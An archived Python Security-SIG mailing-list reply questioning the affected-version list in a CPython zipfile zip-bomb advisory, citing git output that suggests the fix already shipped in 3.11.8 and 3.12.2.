Hello, I am a bit confused about this.
On Tue, 2024-03-19 at 11:10 -0400, Ee Durbin wrote: > An issue was found in the CPython `zipfile` module affecting versions > 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. It seems that 3.11.8 and 3.12.2 already contained a patch for this: $ git describe --contains a956e510f6336d5ae111ba429a61c3ade30a7549 v3.11.8~173 $ git describe --contains fa181fcf2156f703347b03a3b1966ce47be8ab3b v3.12.2~196 > The zipfile module is vulnerable to “quoted-overlap” zip-bombs which > exploit the zip format to create a zip-bomb with a high compression ratio. > The fixed versions of CPython makes the zipfile module reject zip archives > which overlap entries in the archive. -- Best regards, Michał Górny
signature.asc
Description: This is a digitally signed message part
_______________________________________________ Security-SIG mailing list -- security-sig@python.org To unsubscribe send an email to security-sig-le...@python.org https://mail.python.org/mailman3/lists/security-sig.python.org/ Member address: arch...@mail-archive.com
